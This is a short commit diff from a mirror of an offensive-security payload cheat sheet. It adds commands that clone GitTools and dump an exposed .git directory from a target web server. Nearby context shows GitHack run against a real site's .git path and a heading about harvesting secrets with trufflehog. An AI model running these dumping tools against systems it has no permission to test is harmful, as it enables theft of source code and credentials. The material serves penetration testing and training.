mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-12 22:33:00 +00:00
commit
e58bfe8310
1 changed files with 8 additions and 0 deletions
|
@ -140,6 +140,14 @@ git clone https://github.com/lijiejie/GitHack
|
|||
GitHack.py http://www.openssl.org/.git/
|
||||
```
|
||||
|
||||
### Automatic way: GitTools
|
||||
|
||||
```powershell
|
||||
git clone https://github.com/internetwache/GitTools
|
||||
./gitdumper.sh http://target.tld/.git/ /tmp/destdir
|
||||
git checkout -- .
|
||||
```
|
||||
|
||||
### Harvesting secrets : trufflehog
|
||||
|
||||
> Searches through git repositories for high entropy strings and secrets, digging deep into commit history
|
||||
|
|
Loading…
Reference in a new issue